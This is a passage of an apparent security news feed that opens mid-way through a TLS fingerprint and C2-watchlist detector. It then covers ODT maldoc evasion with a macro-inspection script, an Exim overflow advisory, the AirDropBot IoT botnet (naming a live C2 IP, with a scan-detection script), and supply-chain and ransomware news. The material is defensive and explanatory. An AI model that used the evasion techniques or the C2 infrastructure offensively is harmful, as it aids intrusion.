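        pos += 1 + body[pos]                       # skip session_id
        cs_len = _u16(body, pos); pos += 2
        ciphers = [_u16(body, i) for i in range(pos, pos + cs_len, 2)]
        pos += cs_len
        pos += 1 + body[pos]                       # skip compression_methods
        ext_types, sni, alpn = [], None, []
        if pos + 2 <= len(body):
            end = pos + 2 + _u16(body, pos); pos += 2
            while pos + 4 <= end:
                etype, elen = _u16(body, pos), _u16(body, pos + 2); pos += 4
                edata = body[pos:pos + elen]; pos += elen
                ext_types.append(etype)
                if etype == 0 and len(edata) >= 5:     # SNI: list_len(2) type(1) name_len(2) name
                    sni = edata[5:5 + _u16(edata, 3)].decode("ascii", "replace")
                elif etype == 16 and len(edata) >= 2:  # ALPN: list_len(2) then len(1)+proto entries
                    i = 2
                    while i < len(edata):
                        n = edata[i]
                        alpn.append(edata[i + 1:i + 1 + n].decode("ascii", "replace"))
                        i += 1 + n
    except (IndexError, struct.error):
        raise ValueError("malformed ClientHello")
    return {"version": version, "ciphers": ciphers, "extensions": ext_types,
            "sni": sni, "alpn": alpn}


def ja3_string(hello: dict) -> str:
    """Simplified JA3-style string: version,ciphers,extensions (GREASE removed).
    Real JA3 additionally appends the supported groups and EC point formats."""
    ciphers = "-".join(str(c) for c in hello["ciphers"] if c not in GREASE)
    exts = "-".join(str(e) for e in hello["extensions"] if e not in GREASE)
    return f"{hello['version']},{ciphers},{exts}"


def fingerprint(hello: dict) -> str:
    return hashlib.md5(ja3_string(hello).encode()).hexdigest()


# Constructed watchlist standing in for a threat-intel feed of fingerprints seen
# from known C2 clients; the single entry is the sample hello's own fingerprint.
WATCHLIST = {hashlib.md5(b"771,49195-49199-47,0-13-16").hexdigest(): "constructed-C2-family"}


def classify(data: bytes, watchlist: dict = WATCHLIST) -> list:
    """Return detection findings for one ClientHello; an empty list means no match.
    Fingerprints are evadable (the text above explains why), so treat a match as
    one signal in a layered approach rather than a verdict on its own."""
    hello = parse_client_hello(data)
    findings = []
    family = watchlist.get(fingerprint(hello))
    if family:
        findings.append(f"fingerprint matches watchlist entry {family}")
    if hello["sni"] is None:
        findings.append("no SNI in ClientHello (worth correlating with destination)")
    return findings
```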

Enjoyed reading this Threat of the Month? Subscribe to the Threat of the Month blog series and get alerted when new blogs are published. 


TLS version enforcement capabilities now available per certificate binding on Windows Server 2019

At Microsoft, we often develop new security features to meet the specific needs of our own products and online services. This is a story about how we solved a very important problem and are sharing the solution with customers. As engineers worldwide work to eliminate their own dependencies on TLS 1.0, they run into the complex challenge of balancing their own security needs with the migration readiness of their customers. Microsoft faced this as well.

To date, we’ve helped customers address these issues by adding TLS 1.2 support to older operating systems, by shipping new logging formats in IIS for detecting weak TLS usage by clients, as well as providing the latest technical guidance for eliminating TLS 1.0 dependencies.

Now Microsoft is pleased to announce a powerful new feature in Windows to make your transition to a TLS 1.2+ world easier. Beginning with KB4490481, Windows Server 2019 now allows you to block weak TLS versions from being used with individual certificates you designate. We call this feature “Disable Legacy TLS” and it effectively enforces a TLS version and cipher suite floor on any certificate you select.

Disable Legacy TLS also allows an online or on-premises web service to offer two distinct groupings of endpoints on the same hardware: one which allows only TLS 1.2+ traffic, and another which accommodates legacy TLS 1.0 traffic. The changes are implemented in HTTP.sys, and in conjunction with the issuance of additional certificates, allow traffic to be routed to the new endpoint with the appropriate TLS version. Prior to this change, deploying such capabilities would require an additional hardware investment, because such settings were only configurable system-wide via the registry.

For a deep dive on this important new feature and implementation details and scenarios, please see Technical Guidance for Disabling Legacy TLS. Microsoft will also look to make this feature available in its own online services based on customer demand.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post TLS version enforcement capabilities now available per certificate binding on Windows Server 2019 appeared first on Microsoft Security.

Open Document format creates twist in maldoc landscape

By Warren Mercer and Paul Rascagneres.

Introduction

Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach by an actor who has deemed antivirus engines perhaps “too good” at detecting macro-based infection vectors. We’ve noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

There have recently been multiple malware campaigns using this file type that are able to avoid antivirus detection, because these engines view ODT files as standard archives and don’t apply the same rules they normally would for an Office document. We also identified several sandboxes that fail to analyze ODT documents, because the file is considered an archive and the sandbox won’t open it as a Microsoft Office file. Because of this, an attacker can use ODT files to deliver malware that would normally get blocked by traditional antivirus software.

We only found a few samples where this file format was used. The majority of these campaigns using malicious documents still rely on the Microsoft Office file format, but these cases show that the ODT file format could be used in the future at a more successful rate. In this blog post, we’ll walk through three cases of OpenDocument usage. The first two cases target Microsoft Office, while the third targets only OpenOffice and LibreOffice users. We do not know at this time whether these samples were used simply for testing or in a more malicious context.
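The gap described above is that a scanner sees a ZIP, not a document. As an added example (not Talos code and not a real sample), the following Python recognises an ODF package by its mandatory `mimetype` entry and then looks for the places where OpenOffice/LibreOffice store Basic macros (`Basic/<Library>/<Module>.xml`) and embedded OLE objects (`Object N/`), so the file can be routed to document rules instead of archive rules. The sample package is constructed in memory with a harmless macro body.

```python
import io
import zipfile

ODF_MIMETYPES = {
    "application/vnd.oasis.opendocument.text": "odt",
    "application/vnd.oasis.opendocument.spreadsheet": "ods",
    "application/vnd.oasis.opendocument.presentation": "odp",
}
ODT_MIME = "application/vnd.oasis.opendocument.text"


def build_sample_odt(with_macro: bool) -> bytes:
    """Build a minimal constructed ODT package in memory (a stand-in, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Per the ODF package spec, 'mimetype' is the first entry and is stored uncompressed.
        zf.writestr(zipfile.ZipInfo("mimetype"), ODT_MIME, compress_type=zipfile.ZIP_STORED)
        zf.writestr("META-INF/manifest.xml", "<manifest:manifest/>")
        zf.writestr("content.xml", "<office:document-content/>")
        if with_macro:
            # Basic libraries: script-lc.xml / script-lb.xml are indexes, modules hold code.
            zf.writestr("Basic/script-lc.xml", "<library:libraries/>")
            zf.writestr("Basic/Standard/script-lb.xml", "<library:library/>")
            zf.writestr("Basic/Standard/Module1.xml",
                        '<script:module script:name="Module1">'
                        'Sub Main\n  MsgBox "constructed sample"\nEnd Sub</script:module>')
    return buf.getvalue()


def inspect_odf(blob: bytes) -> dict:
    """Classify a blob: plain archive, or ODF document with macros/objects worth scanning."""
    result = {"is_odf": False, "kind": None, "macros": [], "objects": [], "findings": []}
    if not blob.startswith(b"PK"):
        return result
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return result
    infos = zf.infolist()
    names = [i.filename for i in infos]
    if "mimetype" not in names:
        return result                       # an ordinary archive, not an ODF package
    mime = zf.read("mimetype").decode("ascii", "replace").strip()
    kind = ODF_MIMETYPES.get(mime)
    if kind is None:
        return result
    result["is_odf"], result["kind"] = True, kind
    # A conforming package has 'mimetype' first and stored; deviations are worth noting
    # because tools that sniff the first entry may misclassify the file.
    if infos[0].filename != "mimetype" or infos[0].compress_type != zipfile.ZIP_STORED:
        result["findings"].append("mimetype entry not first/stored: nonconforming package")
    for n in names:
        if (n.startswith("Basic/") and n.endswith(".xml")
                and not n.endswith(("script-lc.xml", "script-lb.xml"))):
            result["macros"].append(n)      # a Basic module: this document carries code
        if n.startswith("Object "):
            result["objects"].append(n)     # embedded OLE object directory
    if result["macros"]:
        result["findings"].append("Basic macro module(s) present: apply document rules, not archive rules")
    if result["objects"]:
        result["findings"].append("embedded OLE object(s) present")
    return result
```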

Read more at Talosintelligence.com

Pennsylvania Might Be Second State to Criminalize Cyber-Flashing


Pennsylvania could follow Texas to become the second US state to make cyber-flashing illegal. 

Philadelphia County state representative Mary Isaacson told Infosecurity Magazine that she plans to introduce a bill to ban the unsolicited electronic transmission of sexually explicit and obscene images in the Keystone State at the end of October.

Isaacson sent a memorandum to all 203 members of the Pennsylvania House of Representatives on September 20, calling for them to co-sponsor her proposed legislation. 

"Despite the success of the #MeToo movement, sexual harassment remains a serious problem in our society, particularly due to online forms of sexual harassment. 20% of women and 10% of men ages 18 to 29 report having been sexually harassed online," wrote Isaacson in the memorandum, before calling on members to "please join me in combatting online sexual harassment and ensuring the dignity of all Pennsylvanians."

Speaking to Infosecurity Magazine, Isaacson said that although she hadn't personally received any unsolicited sexually explicit images, she had heard stories from her children about cyber-flashing experienced by their peers. 

"I represent a lot of millennials, and I am a parent of two teens. I worry for my son and my daughter," said Isaacson. "With Air Dropping technology, if a group of teens are at a concert, someone there can send them obscene images that the teens will see whether they have given permission or not. Their privacy is being invaded when they are just trying to have a good time."

Asked what she thought drove people to become cyber-flashers, Isaacson said: "I think that it's their psychology, that they do it to bully and intimidate people and invade their privacy. It's a very serious societal problem that affects everyone, men as well as women."

Isaacson's proposed legislation follows the passage of House Bill 2789 into law in Texas on August 31 this year. Under the new law, the electronic transmission of sexually explicit material without the recipient's consent became a Class C misdemeanor, punishable by a fine of up to $500.

Describing how her bill will differ from what was passed in the Lone Star State, Isaacson said: "Right now, it's modeled after what was done in Texas, but it could possibly change."

Isaacson, who was on the road when speaking to Infosecurity Magazine, was unable to state exactly how many members had answered her co-sponsorship call. However, the state representative was able to confirm that her proposed legislation has secured bipartisan support.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat function (string.c). An attacker could exploit the flaw using an extraordinarily long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (stringc). The currently known exploit uses extraordinary long EHLO string to crash the Exim process that is receiving the message. While this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of the Exim Development Team; it affects all versions of the Exim email server software from 4.92 up to and including 4.92.2. The expert also released a PoC exploit for this vulnerability.

In early September, the Exim development team addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects Exim mail servers version 4.92.1 and prior that accept TLS connections. The vulnerability affects both GnuTLS and OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February.

The flaw is easily exploitable by local and remote attackers in certain non-default configurations, and experts believe that threat actors will start using it in attacks in the wild.

Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.

The major Linux distributions, including Ubuntu, Arch Linux, FreeBSD, Debian, and Fedora, already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

BlackBerry Launches New Cybersecurity Development Labs


Security software and services company BlackBerry Limited has announced the launch of BlackBerry Advanced Technology Development Labs (BlackBerry Labs), a new business unit operating at the forefront of research and development in the cybersecurity space.

The Labs will be led by CTO Charles Eagan and will include a team of over 120 software developers, architects, researchers, product leads and security experts working to identify, explore and create new technologies to ensure BlackBerry is on the cutting edge of security innovation.

The company stated that initial projects from BlackBerry Labs will focus on machine learning approaches to security in partnership with BlackBerry’s existing Cylance, Enterprise and QNX business units.

“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Charles Eagan, BlackBerry CTO. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; artificial intelligence to zero trust environments.”

Pay What You Wish — 9 Hacking Certification Training Courses in 1 Bundle

The greatest threat facing most nations is no longer a standing army. It's a hacker with a computer who can launch a crippling cyber attack from thousands of miles away—potentially taking down everything from server farms to entire power grids with a few lines of code. So it should come as no surprise that virtually every major company in both the public and private sector—as well as national

Social media manipulation as a political tool is spreading

Researchers say 'cyber troops' in 70 countries are using it to automate suppression, mount smear campaigns, or spread disinformation.

Opening up Europe’s Cyber Future

Europe will face a complex cocktail of cyber challenges in the coming five years, from safeguarding our critical infrastructure to protecting itself from election interference and disinformation whilst safeguarding citizen data privacy rights. A new set of leaders is preparing to take office in the European Commission’s headquarters in Brussels to take on these challenges. McAfee, at the cutting edge of cyber defence and mitigation, stands ready to help them embed the principles of open information exchange and interoperability that form the basis of a robust cybersecurity policy.

The principles of openness and interoperability have long been key to the growth of the digital economy. But in the field of cybersecurity, these principles take on an even greater importance. Openness and interoperability are a precondition for vibrant competition and rapid innovation, and competition authorities should remain vigilant to ensure they remain in place even as the digital ecosystem begins to gravitate around the giants that best harness the network effects digital technologies can enable.

But openness and interoperability are not just about innovation. They have become cornerstones for keeping citizens safe as they go about their lives. This is because no single actor has all the information needed to prevent, mitigate or remedy a cyber incident. McAfee has a proud history of precisely such partnerships, sharing emerging threat information in real-time with authorities, and helping them keep the critical infrastructure that we all rely on up and running even as they become prime targets for cyberattacks. Hospitals, transport networks and energy grids are the lifeblood of our society, and we need to keep them safe. Hence, we think it’s right that this Commission focus on their needs and develop new rules to safeguard these vital assets.

When it comes to privacy, Europe has made enormous leaps to improve the trust of citizens in digital services, through more robust privacy rules and cybersecurity regulations and we hope that EU lawmakers continue to keep the safety of their constituents as a top priority. At McAfee, we believe you cannot have privacy without security, and that companies must proactively consider privacy and security on the drawing board and throughout the development process for products and services going to market.

But cybersecurity is also about preparing for the future. In some cases, the best cyber-defences take a long time to develop, and nowhere is this more apparent than in the election interference and disinformation practices that sought to bring the recent EU elections, and our democratic foundations, to their knees.

The May 2019 elections may still be fresh in our memory, but Europe should not lose a second in starting to build its resilience for the next ones. At McAfee, we believe tackling disinformation requires robust cyber hygiene by all. But the best way to address it is using cyber intelligence and tradecraft to understand the adversary, so citizens can better understand the scale of the problem and our politicians can make the most informed decisions on how best to combat it.

McAfee has observed the growing prominence of Cybersecurity on the political agenda. This is a welcome and necessary development to ensure Europe is not taken off-guard by a cyber incident. Of course, Europe’s policymakers in the commission, parliament and council will pay attention to cyber threats when a crisis hits, but as John F Kennedy put it, they would also do well to repair the roof when the sun is shining. Whatever the cyber weather, McAfee will be a trusted partner to make Europe more cyber secure.

The post Opening up Europe’s Cyber Future appeared first on McAfee Blogs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward was worth it: unixfreaxjp is back, with a new, great page of reverse engineering published on the MalwareMustDie blog post: “MMD-0064-2019 – Linux/AirDropBot”.

And this is not just “the” Odisseus’s opinion because I can be counted as a member of the MalwareMustDie crew: technically speaking, this latest post IS a masterpiece, because here unixfreaxjp reveals some unique and undocumented best practices for reversing Linux malware binaries (on Intel and non-Intel platforms), giving every whitehat reverser many references and how-tos for dealing with ELF Linux malware, mixing theory and practice, and showing how incredibly useful Radare r2 and the Tsurugi distribution are.

I don’t know if it is because I have asked my friend unixfreaxjp many times to publicly show how Radare r2 can be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy in the best commercial tools used in the many reverse engineering tutorials available on YouTube.

In fact, this time we have not a “simple” blog post but a rich, strong and powerful technical lesson on how stripped binaries can be reversed, even when they really are stripped.

Step by step, unixfreaxjp leads the reader to understand how the malware code is built, what the methods, the secrets and the hidden techniques are that the coders use to hide and encrypt the C2 address as much as possible, how the operational commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story, when my very good friend @0xrb found this new “Mirai-like” Linux malware in his honeypot, which has important differences from the Mirai implementation. He understood immediately that there was something strange in this new “Mirai variant” and proposed the sample to the MalwareMustDie team: here is his early tweet.

It is also possible to take a look at the logs of the malware that @0xrb published on Pastebin: a lot of information is exposed during the running phase, for example the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb successfully submitted the sample to the MalwareMustDie team for deeper analysis, and the result is another great page of Linux malware reversing that every malware analyst should read and re-read.

We will skip over the technical analysis here, because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux malware aimed at the Internet of Things is appearing constantly, and as previously mentioned it is driven by the money schemes fueling the botnet ecosystem, as previously covered in Security Affairs; this is still the main reason why freshly coded malware in this sector keeps coming up.

First spotted in the wild on August 3rd, 2019, Linux/AirDropBot is malware built to target many embedded Linux platforms; it is meant to spread its botnet across the platforms commonly used in IoT devices. Judging from some unimplemented functions it is still not in the final stage of development, but the adversary’s mission is clear: infect as many Linux IoT devices as possible and get rid of competitors. The first series of samples was detected as Mirai- or Gafgyt-like, which may have led Linux malware researchers to overlook its initial appearance.

The malware targets many processors; when CPUs like ARC cores, Renesas SH, Motorola 68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze are targeted along with the usual cross-compiled architectures (MIPS/ARM/PPC/SPARC/Intel), the herder means serious business in “pwning” every reachable IoT device. The binaries come in two categories: one acts as a bot and is meant to infect small devices; for bigger systems there is a worm-like vulnerability scanner that targets a CGI page on routers (this version aims at HTTP port 8080 and a specific product’s CGI file) and can spread itself in worm-like fashion, alongside the telnet scanning base (attacking TCP port 23 or 2323).

The analysis in MalwareMustDie’s recent post “MMD-0064-2019 – Linux/AirDropBot” shows the latest binary sets used by the adversaries behind this botnet. The scanner function exploiting a certain router vulnerability is hardcoded, and older sample deliveries of this threat aimed at other exploits too. The overall idea is a known one, but the code is newly written.
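The scanning behaviour described above (telnet sweeps on TCP 23/2323 and the worm-like CGI scanner on HTTP port 8080) is the part of this botnet a defender can actually watch for on the wire. The following Python is an added example, not code from the MalwareMustDie analysis or from the malware itself: it parses a constructed connection log in a hypothetical “timestamp src dst dport proto [path]” format and flags sources that sweep telnet ports across many hosts, or repeatedly request a CGI path on port 8080. The CGI file name and the thresholds are assumptions; the analysis names the port, not the file.

```python
"""Flag AirDropBot-style telnet sweeps and CGI probes in connection logs (added example)."""
from collections import defaultdict

TELNET_PORTS = {23, 2323}   # telnet scanning ports named in the analysis
CGI_PORT = 8080             # HTTP port the router CGI scanner targets

# Constructed sample log in a hypothetical "ts src dst dport proto [path]" format.
# "/cgi-bin/target.cgi" is a placeholder: the page names the port, not the file.
SAMPLE_LOG = """\
2019-08-03T10:00:01Z 203.0.113.5 198.51.100.10 23 tcp
2019-08-03T10:00:02Z 203.0.113.5 198.51.100.11 23 tcp
2019-08-03T10:00:02Z 203.0.113.5 198.51.100.12 2323 tcp
2019-08-03T10:00:03Z 203.0.113.5 198.51.100.13 23 tcp
2019-08-03T10:00:03Z 203.0.113.5 198.51.100.14 2323 tcp
2019-08-03T10:00:04Z 203.0.113.5 198.51.100.15 23 tcp
2019-08-03T10:00:10Z 203.0.113.7 198.51.100.20 8080 http /cgi-bin/target.cgi
2019-08-03T10:00:11Z 203.0.113.7 198.51.100.21 8080 http /cgi-bin/target.cgi
2019-08-03T10:00:12Z 203.0.113.7 198.51.100.22 8080 http /cgi-bin/target.cgi
2019-08-03T10:00:20Z 192.0.2.9 198.51.100.30 443 tcp
2019-08-03T10:00:21Z 192.0.2.9 198.51.100.30 22 tcp
this line is malformed and must be skipped
"""


def parse_log(text):
    """Parse log lines into event dicts; malformed lines are dropped, not fatal."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, src, dst, dport, proto = parts[:5]
        if not dport.isdigit():
            continue
        events.append({
            "ts": ts, "src": src, "dst": dst,
            "dport": int(dport), "proto": proto,
            "path": parts[5] if len(parts) > 5 else None,
        })
    return events


def detect(events, telnet_threshold=5, cgi_threshold=3):
    """Group events by source and tag two AirDropBot-like behaviours.

    telnet-scan: one source touching >= telnet_threshold distinct hosts on 23/2323.
    cgi-probe:   one source sending >= cgi_threshold HTTP requests for a CGI
                 path on port 8080 (the worm-like router scanner).
    Thresholds are assumptions to tune against your own background noise.
    """
    telnet_targets = defaultdict(set)
    cgi_probes = defaultdict(int)
    for ev in events:
        if ev["dport"] in TELNET_PORTS:
            telnet_targets[ev["src"]].add(ev["dst"])
        elif (ev["dport"] == CGI_PORT and ev["proto"] == "http" and ev["path"]
              and ("/cgi-bin/" in ev["path"] or ev["path"].endswith(".cgi"))):
            cgi_probes[ev["src"]] += 1

    findings = {}
    for src in set(telnet_targets) | set(cgi_probes):
        tags = []
        if len(telnet_targets[src]) >= telnet_threshold:
            tags.append("telnet-scan")
        if cgi_probes[src] >= cgi_threshold:
            tags.append("cgi-probe")
        if tags:
            findings[src] = {
                "telnet_targets": len(telnet_targets[src]),
                "cgi_probes": cgi_probes[src],
                "tags": tags,
            }
    return findings


if __name__ == "__main__":
    for src, info in sorted(detect(parse_log(SAMPLE_LOG)).items()):
        print(src, info)
```

On real data you would feed it firewall or honeypot connection records and raise telnet_threshold well above the constant background of single hits on port 23 that every internet-facing address receives; counting distinct destinations per source, rather than raw packets, is what separates a sweep from that noise.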

Final considerations on how to face this threat

IoT security quality is improving, and governments around the globe are taking it seriously: in the US, NIST’s “Security Feature Recommendations for IoT Devices” is a good recommended plan; in the UK a voluntary code of practice (CoP) has been published to help manufacturers boost the security of the internet-connected devices that make up the internet of things (IoT); and in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet there are a lot of products to handle, and their vulnerabilities are being researched at the same time by adversaries.
This is why the IoT threat still causes a lot of issues: day by day new exploits come up, old issues are reused, and unpatched segments are exposed and targeted.

Are we on the wrong track then? I don’t think so. Yes, the process takes time, and what we can do is keep improving detection of new threats, containment and response as prevention, to strengthen the defense scheme for the platform, along with the parallel legal work on stopping adversaries. If we commit to keep taking these steps, the adversaries will find more demerits than merits in continuing to hammer us with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/AirDropBot appeared first on Security Affairs.

Supply-Chain Security and Trust

The United States government's continuing disagreement with the Chinese company Huawei underscores a much larger problem with computer technologies in general: We have no choice but to trust them completely, and it's impossible to verify that they're trustworthy. Solving this problem -- which is increasingly a national security issue -- will require us to both make major policy changes and invent new technologies.

The Huawei problem is simple to explain. The company is based in China and subject to the rules and dictates of the Chinese government. The government could require Huawei to install back doors into the 5G routers it sells abroad, allowing the government to eavesdrop on communications or -- even worse -- take control of the routers during wartime. Since the United States will rely on those routers for all of its communications, we become vulnerable by building our 5G backbone on Huawei equipment.

It's obvious that we can't trust computer equipment from a country we don't trust, but the problem is much more pervasive than that. The computers and smartphones you use are not built in the United States. Their chips aren't made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a back door into the final product.

There's more. Open-source software packages are increasingly targeted by groups installing back doors. Fake apps in the Google Play store illustrate vulnerabilities in our software distribution systems. The NotPetya worm was distributed by a fraudulent update to a popular Ukrainian accounting package, illustrating vulnerabilities in our update systems. Hardware chips can be back-doored at the point of fabrication, even if the design is secure. The National Security Agency exploited the shipping process to subvert Cisco routers intended for the Syrian telephone company. The overall problem is that of supply-chain security, because every part of the supply chain can be attacked.

And while nation-state threats like China and Huawei -- or Russia and the antivirus company Kaspersky a couple of years earlier -- make the news, many of the vulnerabilities I described above are being exploited by cybercriminals.

Policy solutions involve forcing companies to open their technical details to inspection, including the source code of their products and the designs of their hardware. Huawei and Kaspersky have offered this sort of openness as a way to demonstrate that they are trustworthy. This is not a worthless gesture, and it helps, but it's not nearly enough. Too many back doors can evade this kind of inspection.

Technical solutions fall into two basic categories, both currently beyond our reach. One is to improve the technical inspection processes for products whose designers provide source code and hardware design specifications, and for products that arrive without any transparency information at all. In both cases, we want to verify that the end product is secure and free of back doors. Sometimes we can do this for some classes of back doors: We can inspect source code -- this is how a Linux back door was discovered and removed in 2003 -- or the hardware design, which becomes a cleverness battle between attacker and defender.

This is an area that needs more research. Today, the advantage goes to the attacker. It's hard to ensure that the hardware and software you examine is the same as what you get, and it's too easy to create back doors that slip past inspection. And while we can find and correct some of these supply-chain attacks, we won't find them all. It's a needle-in-a-haystack problem, except we don't know what a needle looks like. We need technologies, possibly based on artificial intelligence, that can inspect systems more thoroughly and faster than humans can do. We need them quickly.

The other solution is to build a secure system, even though any of its parts can be subverted. This is what the former Deputy Director of National Intelligence Sue Gordon meant in April when she said about 5G, "You have to presume a dirty network." Or more precisely, can we solve this by building trustworthy systems out of untrustworthy parts?

It sounds ridiculous on its face, but the Internet itself was a solution to a similar problem: a reliable network built out of unreliable parts. This was the result of decades of research. That research continues today, and it's how we can have highly resilient distributed systems like Google's network even though none of the individual components are particularly good. It's also the philosophy behind much of the cybersecurity industry today: systems watching one another, looking for vulnerabilities and signs of attack.

Security is a lot harder than reliability. We don't even really know how to build secure systems out of secure parts, let alone out of parts and processes that we can't trust and that are almost certainly being subverted by governments and criminals around the world. Current security technologies are nowhere near good enough, though, to defend against these increasingly sophisticated attacks. So while this is an important part of the solution, and something we need to focus research on, it's not going to solve our near-term problems.

At the same time, all of these problems are getting worse as computers and networks become more critical to personal and national security. The value of 5G isn't for you to watch videos faster; it's for things talking to things without bothering you. These things -- cars, appliances, power plants, smart cities -- increasingly affect the world in a direct physical manner. They're increasingly autonomous, using A.I. and other technologies to make decisions without human intervention. The risk from Chinese back doors into our networks and computers isn't that their government will listen in on our conversations; it's that they'll turn the power off or make all the cars crash into one another.

All of this doesn't leave us with many options for today's supply-chain problems. We still have to presume a dirty network -- as well as back-doored computers and phones -- and we can clean up only a fraction of the vulnerabilities. Citing the lack of non-Chinese alternatives for some of the communications hardware, already some are calling to abandon attempts to secure 5G from Chinese back doors and work on having secure American or European alternatives for 6G networks. It's not nearly enough to solve the problem, but it's a start.


Perhaps these half-solutions are the best we can do. Live with the problem today, and accelerate research to solve the problem for the future. These are research projects on a par with the Internet itself. They need government funding, like the Internet itself. And, also like the Internet, they're critical to national security.

Critically, these systems must be as secure as we can make them. As former FCC Commissioner Tom Wheeler has explained, there's a lot more to securing 5G than keeping Chinese equipment out of the network. This means we have to give up the fantasy that law enforcement can have back doors to aid criminal investigations without also weakening these systems. The world uses one network, and there can only be one answer: Either everyone gets to spy, or no one gets to spy. And as these systems become more critical to national security, a network secure from all eavesdroppers becomes more important.

This essay previously appeared in the New York Times.

Ransomware attacks against small towns require collective defense

There is a war hitting small-town America. Hackers are not only on our shores, but they’re in our water districts, in our regional hospitals, and in our 911 emergency systems. The target du jour of ransomware hackers is small towns and they have gone after them with a vengeance. Last month, the governor of Texas, Greg Abbott, declared a “Level 2 Escalated Response” as 22 of Texas’s cities were hit simultaneously with ransomware attacks, crippling … More

The post Ransomware attacks against small towns require collective defense appeared first on Help Net Security.

Senate Passes Ransomware Law

A new bill has passed the US Senate which would require the federal government to ramp up its support for organizations hit by ransomware.

The DHS Cyber Hunt and Incident Response Teams Act would require the Department of Homeland Security (DHS) to build dedicated teams tasked with providing advice to organizations on how best to protect their systems from attack, as well as other technical support, including incident response assistance.

Although the new capabilities would be available to all public and private organizations on request — including businesses, police departments, hospitals, and banks — Senate Minority Leader Chuck Schumer focused on protection for New York state schools in his comments on the legislation.

“The Senate passing the DHS Cyber Hunt and Incident Response Teams Act is an important step in protecting upstate New York school districts from the swaths of ransomware attacks that take hostage the personal information and vital data of our students, school employees and local governments,” he said in a statement.

“It’s critical that we use all available resources to protect New York students from cyber crooks, and enhance and increase our resiliency to these attacks. I’m proud of the role I played in pushing this sorely-needed legislation through the senate and won’t stop working until it’s signed into law.”

One security vendor calculated last week that ransomware attacks have disrupted operations at 49 US school districts and educational institutions in the first nine months of the year, compromising potentially 500 K-12 schools versus just 11 last year.

This makes the sector the second most popular for ransomware attackers after local municipalities.

These have been battered by attacks over the past few months, with one campaign in Texas hitting 23 local government entities simultaneously.

A similar piece of legislation to the DHS Cyber Hunt and Incident Response Teams Act has already passed in the House of Representatives, so the two will now begin the reconciliation process.

Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“It is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Iran’s oil ministry said that Washington has launched a “full-scale economic war” against the Islamic Republic.

In mid-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant; according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia with further attacks. The Iran-aligned Houthi rebel movement has been fighting the Yemeni government and a coalition of regional countries led by Saudi Arabia since 2015, when President Abdrabbuh Mansour Hadi was driven out of Sanaa by the Houthis.

US Secretary of State Mike Pompeo blamed Iran for coordinating the attacks, adding that the world is facing an unprecedented attack on its energy supply.

